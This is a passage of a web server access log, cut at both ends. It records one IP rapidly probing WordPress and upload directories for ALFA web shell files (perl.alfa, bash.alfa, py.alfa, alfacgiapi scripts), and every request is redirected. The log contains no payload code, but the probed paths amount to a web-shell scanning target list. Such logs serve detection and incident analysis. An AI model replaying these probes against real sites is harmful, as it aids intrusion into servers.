Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:57 -0400] "POST /uploads/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:57 -0400] "POST /uploads/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:57 -0400] "POST /uploads/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:58 -0400] "POST /uploads/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:58 -0400] "POST /uploads/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:58 -0400] "POST /uploads/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:58 -0400] "GET /uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:58 -0400] "GET /uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:58:58 -0400] "GET /uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 282 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:03 -0400] "POST /assets/upload/alfacgiapi/perl.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:03 -0400] "POST /assets/upload/alfacgiapi/perl.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:03 -0400] "POST /assets/upload/alfacgiapi/bash.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:04 -0400] "POST /assets/upload/alfacgiapi/bash.alfa HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:04 -0400] "POST /assets/upload/alfacgiapi/py.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:04 -0400] "POST /assets/upload/alfacgiapi/py.alfa HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:04 -0400] "GET /assets/upload/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:04 -0400] "GET /assets/upload/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:04 -0400] "GET /assets/upload/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:18 -0400] "POST /assets/upload/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:18 -0400] "POST /assets/upload/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:19 -0400] "POST /assets/upload/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:19 -0400] "POST /assets/upload/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:19 -0400] "POST /assets/upload/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:19 -0400] "POST /assets/upload/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:19 -0400] "GET /assets/upload/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 290 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:19 -0400] "GET /assets/upload/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 290 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:19 -0400] "GET /assets/upload/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:27 -0400] "POST /assets/uploads/alfacgiapi/perl.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:27 -0400] "POST /assets/uploads/alfacgiapi/perl.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:27 -0400] "POST /assets/uploads/alfacgiapi/bash.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:27 -0400] "POST /assets/uploads/alfacgiapi/bash.alfa HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:27 -0400] "POST /assets/uploads/alfacgiapi/py.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:28 -0400] "POST /assets/uploads/alfacgiapi/py.alfa HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:28 -0400] "GET /assets/uploads/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:28 -0400] "GET /assets/uploads/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 281 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:28 -0400] "GET /assets/uploads/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:29 -0400] "POST /assets/uploads/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:29 -0400] "POST /assets/uploads/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:30 -0400] "POST /assets/uploads/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:30 -0400] "POST /assets/uploads/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:30 -0400] "POST /assets/uploads/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:30 -0400] "POST /assets/uploads/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:30 -0400] "GET /assets/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:30 -0400] "GET /assets/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:31 -0400] "GET /assets/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 289 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:11:59:31 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:33 -0400] "POST /wp-content/alfacgiapi/perl.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:34 -0400] "POST /wp-content/alfacgiapi/perl.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:34 -0400] "POST /wp-content/alfacgiapi/bash.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:34 -0400] "POST /wp-content/alfacgiapi/bash.alfa HTTP/1.1" 301 262 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:34 -0400] "POST /wp-content/alfacgiapi/py.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:34 -0400] "POST /wp-content/alfacgiapi/py.alfa HTTP/1.1" 301 260 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:34 -0400] "GET /wp-content/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:34 -0400] "GET /wp-content/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:35 -0400] "GET /wp-content/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:40 -0400] "POST /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/perl.alfa HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:40 -0400] "POST /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/perl.alfa HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:40 -0400] "POST /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/bash.alfa HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:40 -0400] "POST /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/bash.alfa HTTP/1.1" 301 302 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:41 -0400] "POST /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/py.alfa HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:41 -0400] "POST /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/py.alfa HTTP/1.1" 301 300 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:41 -0400] "GET /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 317 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:41 -0400] "GET /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 317 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:41 -0400] "GET /wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 315 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:44 -0400] "POST /wp-content/uploads/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:44 -0400] "POST /wp-content/uploads/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:44 -0400] "POST /wp-content/uploads/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:45 -0400] "POST /wp-content/uploads/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:45 -0400] "POST /wp-content/uploads/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:45 -0400] "POST /wp-content/uploads/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:45 -0400] "GET /wp-content/uploads/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:45 -0400] "GET /wp-content/uploads/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:45 -0400] "GET /wp-content/uploads/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:55 -0400] "POST /wp-content/plugins/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:55 -0400] "POST /wp-content/plugins/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:55 -0400] "POST /wp-content/plugins/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:55 -0400] "POST /wp-content/plugins/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:55 -0400] "POST /wp-content/plugins/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:56 -0400] "POST /wp-content/plugins/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:56 -0400] "GET 